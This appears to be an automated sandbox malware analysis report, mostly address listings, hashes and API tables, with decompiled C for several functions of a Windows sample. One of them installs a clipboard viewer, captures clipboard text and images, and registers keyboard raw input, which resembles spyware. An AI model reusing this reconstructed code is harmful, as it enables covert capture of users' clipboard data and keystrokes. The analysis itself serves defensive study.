                                                                                                                                                                                                                                                                  0x00406d1d
                                                                                                                                                                                                                                                                  0x00406d20
                                                                                                                                                                                                                                                                  0x00406d23
                                                                                                                                                                                                                                                                  0x00406d3a
                                                                                                                                                                                                                                                                  0x00406d3d
                                                                                                                                                                                                                                                                  0x00406d40
                                                                                                                                                                                                                                                                  0x00406d43
                                                                                                                                                                                                                                                                  0x00406d54
                                                                                                                                                                                                                                                                  0x00406d57
                                                                                                                                                                                                                                                                  0x00406d5a
                                                                                                                                                                                                                                                                  0x00406d5d
                                                                                                                                                                                                                                                                  0x00406d60
                                                                                                                                                                                                                                                                  0x00406d63
                                                                                                                                                                                                                                                                  0x00406d7c
                                                                                                                                                                                                                                                                  0x00406d7f
                                                                                                                                                                                                                                                                  0x00406d82
                                                                                                                                                                                                                                                                  0x00406d85
                                                                                                                                                                                                                                                                  0x00406d88
                                                                                                                                                                                                                                                                  0x00406d8b
                                                                                                                                                                                                                                                                  0x00406db0
                                                                                                                                                                                                                                                                  0x00406db3
                                                                                                                                                                                                                                                                  0x00406dbe
                                                                                                                                                                                                                                                                  0x00406dc9
                                                                                                                                                                                                                                                                  0x00406dcc
                                                                                                                                                                                                                                                                  0x00406dd7
                                                                                                                                                                                                                                                                  0x00406de2
                                                                                                                                                                                                                                                                  0x00406de5
                                                                                                                                                                                                                                                                  0x00406de8
                                                                                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                                                                                  0x00406df3
                                                                                                                                                                                                                                                                  0x00406df9
                                                                                                                                                                                                                                                                  0x00406dfc
                                                                                                                                                                                                                                                                  0x00406dff
                                                                                                                                                                                                                                                                  0x00406e16
                                                                                                                                                                                                                                                                  0x00406e19
                                                                                                                                                                                                                                                                  0x00406e1c
                                                                                                                                                                                                                                                                  0x00406e1f
                                                                                                                                                                                                                                                                  0x00406e30
                                                                                                                                                                                                                                                                  0x00406e33
                                                                                                                                                                                                                                                                  0x00406e36
                                                                                                                                                                                                                                                                  0x00406e39
                                                                                                                                                                                                                                                                  0x00406e3c
                                                                                                                                                                                                                                                                  0x00406e3f
                                                                                                                                                                                                                                                                  0x00406e58
                                                                                                                                                                                                                                                                  0x00406e5b
                                                                                                                                                                                                                                                                  0x00406e5e
                                                                                                                                                                                                                                                                  0x00406e61
                                                                                                                                                                                                                                                                  0x00406e64
                                                                                                                                                                                                                                                                  0x00406e67
                                                                                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                                                                                  0x00406e9a
                                                                                                                                                                                                                                                                  0x00406ea5
                                                                                                                                                                                                                                                                  0x00406ea8
                                                                                                                                                                                                                                                                  0x00406eb3
                                                                                                                                                                                                                                                                  0x00406ebe
                                                                                                                                                                                                                                                                  0x00406ec1
                                                                                                                                                                                                                                                                  0x00406ec4
                                                                                                                                                                                                                                                                  0x00406ec8
                                                                                                                                                                                                                                                                  0x00406ecf
                                                                                                                                                                                                                                                                  0x00406ed5
                                                                                                                                                                                                                                                                  0x00406ed8
                                                                                                                                                                                                                                                                  0x00406edb
                                                                                                                                                                                                                                                                  0x00406ef2
                                                                                                                                                                                                                                                                  0x00406ef5
                                                                                                                                                                                                                                                                  0x00406ef8
                                                                                                                                                                                                                                                                  0x00406efb
                                                                                                                                                                                                                                                                  0x00406f0c
                                                                                                                                                                                                                                                                  0x00406f0f
                                                                                                                                                                                                                                                                  0x00406f12
                                                                                                                                                                                                                                                                  0x00406f15
                                                                                                                                                                                                                                                                  0x00406f18
                                                                                                                                                                                                                                                                  0x00406f1b
                                                                                                                                                                                                                                                                  0x00406f34
                                                                                                                                                                                                                                                                  0x00406f37
                                                                                                                                                                                                                                                                  0x00406f3a
                                                                                                                                                                                                                                                                  0x00406f3d
                                                                                                                                                                                                                                                                  0x00406f40
                                                                                                                                                                                                                                                                  0x00406f43
                                                                                                                                                                                                                                                                  0x00406f68
                                                                                                                                                                                                                                                                  0x00406f6b
                                                                                                                                                                                                                                                                  0x00406f76
                                                                                                                                                                                                                                                                  0x00406f81
                                                                                                                                                                                                                                                                  0x00406f84
                                                                                                                                                                                                                                                                  0x00406f8f
                                                                                                                                                                                                                                                                  0x00406f9a
                                                                                                                                                                                                                                                                  0x00406f9d
                                                                                                                                                                                                                                                                  0x00406fa0
                                                                                                                                                                                                                                                                  0x00406fa4
                                                                                                                                                                                                                                                                  0x00406fab
                                                                                                                                                                                                                                                                  0x00406fb1
                                                                                                                                                                                                                                                                  0x00406fb4
                                                                                                                                                                                                                                                                  0x00406fb7
                                                                                                                                                                                                                                                                  0x00406fce
                                                                                                                                                                                                                                                                  0x00406fd1
                                                                                                                                                                                                                                                                  0x00406fd4
                                                                                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                                                                                  0x00406fe8
                                                                                                                                                                                                                                                                  0x00406feb
                                                                                                                                                                                                                                                                  0x00406fee
                                                                                                                                                                                                                                                                  0x00406ff1
                                                                                                                                                                                                                                                                  0x00406ff4
                                                                                                                                                                                                                                                                  0x00406ff7
                                                                                                                                                                                                                                                                  0x00407010
                                                                                                                                                                                                                                                                  0x00407013
                                                                                                                                                                                                                                                                  0x00407016
                                                                                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                                                                                  0x0040701c
                                                                                                                                                                                                                                                                  0x0040701f
                                                                                                                                                                                                                                                                  0x00407044
                                                                                                                                                                                                                                                                  0x00407047
                                                                                                                                                                                                                                                                  0x00407052
                                                                                                                                                                                                                                                                  0x0040705d
                                                                                                                                                                                                                                                                  0x00407060
                                                                                                                                                                                                                                                                  0x0040706b
                                                                                                                                                                                                                                                                  0x00407076
                                                                                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                                                                                  0x0040707c
                                                                                                                                                                                                                                                                  0x00407080
                                                                                                                                                                                                                                                                  0x00407087
                                                                                                                                                                                                                                                                  0x0040708d
                                                                                                                                                                                                                                                                  0x00407090
                                                                                                                                                                                                                                                                  0x00407093
                                                                                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                                                                                  0x004070b0
                                                                                                                                                                                                                                                                  0x004070b3
                                                                                                                                                                                                                                                                  0x004070c4
                                                                                                                                                                                                                                                                  0x004070c7
                                                                                                                                                                                                                                                                  0x004070ca
                                                                                                                                                                                                                                                                  0x004070cd
                                                                                                                                                                                                                                                                  0x004070d0
                                                                                                                                                                                                                                                                  0x004070d3
                                                                                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                                                                                  0x004070f5
                                                                                                                                                                                                                                                                  0x004070f8
                                                                                                                                                                                                                                                                  0x004070fb
                                                                                                                                                                                                                                                                  0x0040711a
                                                                                                                                                                                                                                                                  0x0040711d
                                                                                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                                                                                  0x00407133
                                                                                                                                                                                                                                                                  0x00407136
                                                                                                                                                                                                                                                                  0x00407141
                                                                                                                                                                                                                                                                  0x0040714c
                                                                                                                                                                                                                                                                  0x0040714f
                                                                                                                                                                                                                                                                  0x00407152
                                                                                                                                                                                                                                                                  0x00407156
                                                                                                                                                                                                                                                                  0x00407162
                                                                                                                                                                                                                                                                  0x00407173
                                                                                                                                                                                                                                                                  0x00407188
                                                                                                                                                                                                                                                                  0x00407192
                                                                                                                                                                                                                                                                  0x00407195
                                                                                                                                                                                                                                                                  0x0040719e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040719e
                                                                                                                                                                                                                                                                  0x004071a6
                                                                                                                                                                                                                                                                  0x004071ab
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004071ab

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 673498613-0
                                                                                                                                                                                                                                                                  • Opcode ID: 062b4d37afa271e53c3d93c0b151de2d0b24e3dd2dff1a236250f0fc1610d9aa
                                                                                                                                                                                                                                                                  • Instruction ID: 36a8d434eca8a7f406f9c4b8afd5eeaa440909439197762f58292061664ca10c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 062b4d37afa271e53c3d93c0b151de2d0b24e3dd2dff1a236250f0fc1610d9aa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DD21D79D11619EFCB54CF99C18099EFBF1FF88320F66859A9845AB305C630BA91DF80
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 406 404bb0-404bff CreateDirectoryW wsprintfW FindFirstFileW 407 404c05-404c19 lstrcmpW 406->407 408 404cdf-404ce2 406->408 409 404c31 407->409 410 404c1b-404c2f lstrcmpW 407->410 412 404cac-404cc2 FindNextFileW 409->412 410->409 411 404c33-404c7c wsprintfW * 2 410->411 413 404c96-404ca6 MoveFileExW 411->413 414 404c7e-404c94 call 404bb0 411->414 412->407 415 404cc8-404cd9 FindClose RemoveDirectoryW 412->415 413->412 414->412 415->408
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404BB0(WCHAR* _a4, char _a8) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				struct _WIN32_FIND_DATAW _v1116;
                                                                                                                                                                                                                                                                  				void* _v1120;
                                                                                                                                                                                                                                                                  				short _v1644;
                                                                                                                                                                                                                                                                  				short _v2164;
                                                                                                                                                                                                                                                                  				void* _t29;
                                                                                                                                                                                                                                                                  				void* _t60;
                                                                                                                                                                                                                                                                  				void* _t61;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t1 =  &_a8; // 0x40517b
                                                                                                                                                                                                                                                                  				CreateDirectoryW( *_t1, 0);
                                                                                                                                                                                                                                                                  				wsprintfW( &_v524, L"%s\\*", _a4);
                                                                                                                                                                                                                                                                  				_t61 = _t60 + 0xc;
                                                                                                                                                                                                                                                                  				_t29 = FindFirstFileW( &_v524,  &_v1116);
                                                                                                                                                                                                                                                                  				_v1120 = _t29;
                                                                                                                                                                                                                                                                  				if(_v1120 == 0xffffffff) {
                                                                                                                                                                                                                                                                  					return _t29;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					if(lstrcmpW( &(_v1116.cFileName), ".") != 0 && lstrcmpW( &(_v1116.cFileName), L"..") != 0) {
                                                                                                                                                                                                                                                                  						wsprintfW( &_v1644, L"%s\\%s", _a4,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                  						_t14 =  &_a8; // 0x40517b
                                                                                                                                                                                                                                                                  						wsprintfW( &_v2164, L"%s\\%s",  *_t14,  &(_v1116.cFileName));
                                                                                                                                                                                                                                                                  						_t61 = _t61 + 0x20;
                                                                                                                                                                                                                                                                  						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                  							MoveFileExW( &_v1644,  &_v2164, 9);
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							E00404BB0( &_v1644,  &_v2164);
                                                                                                                                                                                                                                                                  							_t61 = _t61 + 8;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} while (FindNextFileW(_v1120,  &_v1116) != 0);
                                                                                                                                                                                                                                                                  				FindClose(_v1120);
                                                                                                                                                                                                                                                                  				return RemoveDirectoryW(_a4);
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x00404bbb
                                                                                                                                                                                                                                                                  0x00404bbf
                                                                                                                                                                                                                                                                  0x00404bd5
                                                                                                                                                                                                                                                                  0x00404bdb
                                                                                                                                                                                                                                                                  0x00404bec
                                                                                                                                                                                                                                                                  0x00404bf2
                                                                                                                                                                                                                                                                  0x00404bff
                                                                                                                                                                                                                                                                  0x00404ce2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404c05
                                                                                                                                                                                                                                                                  0x00404c05
                                                                                                                                                                                                                                                                  0x00404c19
                                                                                                                                                                                                                                                                  0x00404c4a
                                                                                                                                                                                                                                                                  0x00404c5a
                                                                                                                                                                                                                                                                  0x00404c6a
                                                                                                                                                                                                                                                                  0x00404c70
                                                                                                                                                                                                                                                                  0x00404c7c
                                                                                                                                                                                                                                                                  0x00404ca6
                                                                                                                                                                                                                                                                  0x00404c7e
                                                                                                                                                                                                                                                                  0x00404c8c
                                                                                                                                                                                                                                                                  0x00404c91
                                                                                                                                                                                                                                                                  0x00404c91
                                                                                                                                                                                                                                                                  0x00404c7c
                                                                                                                                                                                                                                                                  0x00404cc0
                                                                                                                                                                                                                                                                  0x00404ccf
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32({Q@,00000000), ref: 00404BBF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404BD5
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00404BEC
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,004105FC), ref: 00404C11
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,00410600), ref: 00404C27
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404C4A
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404C6A
                                                                                                                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000009), ref: 00404CA6
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(000000FF,?), ref: 00404CBA
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00404CCF
                                                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00404CD9
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*${Q@
                                                                                                                                                                                                                                                                  • API String ID: 92872011-1064697655
                                                                                                                                                                                                                                                                  • Opcode ID: e840542102ed46a4bdf26edd650883959731639ebf51fd0069a4ee6c028d1a6c
                                                                                                                                                                                                                                                                  • Instruction ID: 6f6817d729ebc618073356bb80865953dc886d528bab8797446079342b48442e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e840542102ed46a4bdf26edd650883959731639ebf51fd0069a4ee6c028d1a6c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82317BB5504218EFDB20DFA0DD48EDA7378BB84301F0085B5F609A7585DB74DA99CF98
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 418 403ed0-403ef2 GetWindowLongW 419 403ef4-403efb 418->419 420 403f16-403f1d 418->420 421 403f01-403f05 419->421 422 403f87-403f98 IsClipboardFormatAvailable 419->422 423 403f46-403f4c 420->423 424 403f1f 420->424 429 403f24-403f41 SetClipboardViewer SetWindowLongW 421->429 430 403f07-403f0b 421->430 427 403fa3-403fad IsClipboardFormatAvailable 422->427 428 403f9a-403fa1 422->428 425 403f66-403f6a 423->425 426 403f4e-403f64 SetWindowLongW 423->426 431 404104-40411d DefWindowProcA 424->431 432 403f82 425->432 433 403f6c-403f7c SendMessageA 425->433 426->432 435 403fb8-403fc2 IsClipboardFormatAvailable 427->435 436 403faf-403fb6 427->436 434 403fcb-403fcf 428->434 429->431 437 403f11 430->437 438 4040bd-4040fe RegisterRawInputDevices ChangeClipboardChain 430->438 432->431 433->432 440 403fd5-403fdf OpenClipboard 434->440 441 40409f-4040a3 434->441 435->434 439 403fc4 435->439 436->434 437->431 438->431 439->434 440->441 444 403fe5-403ff6 GetClipboardData 440->444 442 4040a5-4040b5 SendMessageA 441->442 443 4040bb 441->443 442->443 443->431 445 403ff8 444->445 446 403ffd-40400e GlobalLock 444->446 445->431 447 404010 446->447 448 404015-404026 446->448 447->431 449 404028-40402c 448->449 450 404049-40405c call 403ce0 448->450 451 40405e-40406e call 403e00 449->451 452 40402e-404032 449->452 458 404071-404085 GlobalUnlock CloseClipboard 450->458 451->458 454 404034 452->454 455 404036-404047 call 403c20 452->455 454->458 455->458 458->441 462 404087-40409c call 403480 call 408990 458->462 462->441
                                                                                                                                                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                                                                                                                                                  			E00403ED0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                                                                                                                                                                                                  				struct HWND__* _v8;
                                                                                                                                                                                                                                                                  				int _v12;
                                                                                                                                                                                                                                                                  				struct HWND__* _v16;
                                                                                                                                                                                                                                                                  				void* _v20;
                                                                                                                                                                                                                                                                  				void* _v24;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				int _v32;
                                                                                                                                                                                                                                                                  				short _v34;
                                                                                                                                                                                                                                                                  				char _v36;
                                                                                                                                                                                                                                                                  				int _v40;
                                                                                                                                                                                                                                                                  				int _v44;
                                                                                                                                                                                                                                                                  				struct HWND__* _t90;
                                                                                                                                                                                                                                                                  				struct HWND__* _t97;
                                                                                                                                                                                                                                                                  				struct HWND__* _t98;
                                                                                                                                                                                                                                                                  				void* _t129;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                                                                                                                                                                                                  				_v40 = _a8;
                                                                                                                                                                                                                                                                  				if(_v40 > 0x308) {
                                                                                                                                                                                                                                                                  					if(_v40 == 0x30d) {
                                                                                                                                                                                                                                                                  						if(_a12 != _v8) {
                                                                                                                                                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                                                                                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v8 = _a16;
                                                                                                                                                                                                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L38;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						L38:
                                                                                                                                                                                                                                                                  						return DefWindowProcA(_a4, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_v40 == 0x308) {
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                                                                                                                                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                                                                                                                                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                                                                                                                                                                                                  								_v12 = 7;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v12 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v12 = 0xd;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                                                                                                                                                                                                  						L34:
                                                                                                                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                                                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                                                                                                                                                                                                  						if(_v24 != 0) {
                                                                                                                                                                                                                                                                  							_v20 = GlobalLock(_v24);
                                                                                                                                                                                                                                                                  							if(_v20 != 0) {
                                                                                                                                                                                                                                                                  								_v16 = 0;
                                                                                                                                                                                                                                                                  								_v44 = _v12;
                                                                                                                                                                                                                                                                  								if(_v44 == 1) {
                                                                                                                                                                                                                                                                  									_t90 = E00403CE0(_v20, 0, 0);
                                                                                                                                                                                                                                                                  									_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                  									_v16 = _t90;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									if(_v44 == 7) {
                                                                                                                                                                                                                                                                  										_t97 = E00403E00(_v20, 0, 0);
                                                                                                                                                                                                                                                                  										_t129 = _t129 + 0xc;
                                                                                                                                                                                                                                                                  										_v16 = _t97;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										if(_v44 == 0xd) {
                                                                                                                                                                                                                                                                  											_t98 = E00403C20(_v20, _v20, 0);
                                                                                                                                                                                                                                                                  											_t129 = _t129 + 8;
                                                                                                                                                                                                                                                                  											_v16 = _t98;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								GlobalUnlock(_v24);
                                                                                                                                                                                                                                                                  								CloseClipboard();
                                                                                                                                                                                                                                                                  								if(_v16 != 0) {
                                                                                                                                                                                                                                                                  									E00403480(_v16);
                                                                                                                                                                                                                                                                  									E00408990(_v16);
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								goto L34;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							goto L38;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					goto L38;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				if(_v40 == 1) {
                                                                                                                                                                                                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                                                                                                                                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					if(_v40 == 2) {
                                                                                                                                                                                                                                                                  						_v36 = 0;
                                                                                                                                                                                                                                                                  						_v34 = 0;
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v26 = 0;
                                                                                                                                                                                                                                                                  						_v36 = 1;
                                                                                                                                                                                                                                                                  						_v34 = 6;
                                                                                                                                                                                                                                                                  						_v32 = 1;
                                                                                                                                                                                                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                                                                                                                                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				goto L38;
                                                                                                                                                                                                                                                                  			}



















                                                                                                                                                                                                                                                                  0x00403ee2
                                                                                                                                                                                                                                                                  0x00403ee8
                                                                                                                                                                                                                                                                  0x00403ef2
                                                                                                                                                                                                                                                                  0x00403f1d
                                                                                                                                                                                                                                                                  0x00403f4c
                                                                                                                                                                                                                                                                  0x00403f6a
                                                                                                                                                                                                                                                                  0x00403f7c
                                                                                                                                                                                                                                                                  0x00403f7c
                                                                                                                                                                                                                                                                  0x00403f4e
                                                                                                                                                                                                                                                                  0x00403f51
                                                                                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                                                                                  0x00403f5e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403f1f
                                                                                                                                                                                                                                                                  0x00404104
                                                                                                                                                                                                                                                                  0x0040411d
                                                                                                                                                                                                                                                                  0x0040411d
                                                                                                                                                                                                                                                                  0x00403f1d
                                                                                                                                                                                                                                                                  0x00403efb
                                                                                                                                                                                                                                                                  0x00403f87
                                                                                                                                                                                                                                                                  0x00403f98
                                                                                                                                                                                                                                                                  0x00403fad
                                                                                                                                                                                                                                                                  0x00403fc2
                                                                                                                                                                                                                                                                  0x00403fc4
                                                                                                                                                                                                                                                                  0x00403fc4
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403faf
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403f9a
                                                                                                                                                                                                                                                                  0x00403fcf
                                                                                                                                                                                                                                                                  0x0040409f
                                                                                                                                                                                                                                                                  0x004040a3
                                                                                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                                                                                  0x004040b5
                                                                                                                                                                                                                                                                  0x00403fe5
                                                                                                                                                                                                                                                                  0x00403fef
                                                                                                                                                                                                                                                                  0x00403ff6
                                                                                                                                                                                                                                                                  0x00404007
                                                                                                                                                                                                                                                                  0x0040400e
                                                                                                                                                                                                                                                                  0x00404015
                                                                                                                                                                                                                                                                  0x0040401f
                                                                                                                                                                                                                                                                  0x00404026
                                                                                                                                                                                                                                                                  0x00404051
                                                                                                                                                                                                                                                                  0x00404056
                                                                                                                                                                                                                                                                  0x00404059
                                                                                                                                                                                                                                                                  0x00404028
                                                                                                                                                                                                                                                                  0x0040402c
                                                                                                                                                                                                                                                                  0x00404066
                                                                                                                                                                                                                                                                  0x0040406b
                                                                                                                                                                                                                                                                  0x0040406e
                                                                                                                                                                                                                                                                  0x0040402e
                                                                                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                                                                                  0x0040403c
                                                                                                                                                                                                                                                                  0x00404041
                                                                                                                                                                                                                                                                  0x00404044
                                                                                                                                                                                                                                                                  0x00404044
                                                                                                                                                                                                                                                                  0x00404032
                                                                                                                                                                                                                                                                  0x0040402c
                                                                                                                                                                                                                                                                  0x00404075
                                                                                                                                                                                                                                                                  0x0040407b
                                                                                                                                                                                                                                                                  0x00404085
                                                                                                                                                                                                                                                                  0x0040408b
                                                                                                                                                                                                                                                                  0x00404097
                                                                                                                                                                                                                                                                  0x0040409c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404085
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404010
                                                                                                                                                                                                                                                                  0x00403ff8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403fcf
                                                                                                                                                                                                                                                                  0x00403f05
                                                                                                                                                                                                                                                                  0x00403f2e
                                                                                                                                                                                                                                                                  0x00403f3b
                                                                                                                                                                                                                                                                  0x00403f07
                                                                                                                                                                                                                                                                  0x00403f0b
                                                                                                                                                                                                                                                                  0x004040bf
                                                                                                                                                                                                                                                                  0x004040c5
                                                                                                                                                                                                                                                                  0x004040c8
                                                                                                                                                                                                                                                                  0x004040cb
                                                                                                                                                                                                                                                                  0x004040d4
                                                                                                                                                                                                                                                                  0x004040dd
                                                                                                                                                                                                                                                                  0x004040e1
                                                                                                                                                                                                                                                                  0x004040f0
                                                                                                                                                                                                                                                                  0x004040fe
                                                                                                                                                                                                                                                                  0x004040fe
                                                                                                                                                                                                                                                                  0x00403f0b
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403EDC
                                                                                                                                                                                                                                                                  • SetClipboardViewer.USER32(?), ref: 00403F28
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32 ref: 00403F3B
                                                                                                                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403F90
